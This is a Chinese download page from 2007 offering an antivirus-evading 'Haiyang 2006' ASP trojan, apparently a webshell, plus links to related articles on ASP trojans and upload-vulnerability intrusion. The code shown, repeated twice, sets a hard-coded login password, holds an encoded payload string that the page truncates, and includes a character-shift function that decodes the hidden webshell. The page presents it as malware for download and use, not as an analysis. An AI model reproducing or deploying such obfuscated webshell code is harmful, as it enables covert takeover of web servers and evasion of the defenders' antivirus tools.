提供個(gè) 全免殺海洋2006asp木馬 下載
更新時(shí)間:2007年06月07日 00:00:00 作者:
<%
Const userPassword = "testit" ''登錄密碼
hu="琳琳5(63216(P:5,7(BD^2省略很多
function UnEncode(temp)
but=34
for i = 1 to len(temp)
if mid(temp,i,1)<> "琳" then
If Asc(Mid(temp, i, 1)) < 32 Or Asc(Mid(temp, i, 1)) > 126 Then
a = a & Chr(Asc(Mid(temp, i, 1)))
else
pk=asc(mid(temp,i,1))-but
if pk>126 then
pk=pk-95
elseif pk<32 then
pk=pk+95
end if
a=a&chr(pk)
end if
else
a=a&vbcrlf
end if
next
UnEncode=a
end function
%>
本地下載
Const userPassword = "testit" ''登錄密碼
hu="琳琳5(63216(P:5,7(BD^2省略很多
function UnEncode(temp)
but=34
for i = 1 to len(temp)
if mid(temp,i,1)<> "琳" then
If Asc(Mid(temp, i, 1)) < 32 Or Asc(Mid(temp, i, 1)) > 126 Then
a = a & Chr(Asc(Mid(temp, i, 1)))
else
pk=asc(mid(temp,i,1))-but
if pk>126 then
pk=pk-95
elseif pk<32 then
pk=pk+95
end if
a=a&chr(pk)
end if
else
a=a&vbcrlf
end if
next
UnEncode=a
end function
%>
本地下載
相關(guān)文章
ASP網(wǎng)站中數(shù)據(jù)庫被掛木馬的解決方案
我們在用ASP連接數(shù)據(jù)庫開發(fā)應(yīng)用程序時(shí),可能會(huì)遇到ASP數(shù)據(jù)庫被掛木馬的情況,本文我們就介紹了ASP數(shù)據(jù)庫被掛木馬時(shí)的編程處理方法,希望會(huì)對您有所幫助2015-09-09
實(shí)例分析ASP上傳漏洞入侵實(shí)戰(zhàn)及擴(kuò)展
實(shí)例分析ASP上傳漏洞入侵實(shí)戰(zhàn)及擴(kuò)展...2006-09-09
用asp實(shí)現(xiàn)的iframe批量替換工具
用asp實(shí)現(xiàn)的iframe批量替換工具...2007-09-09

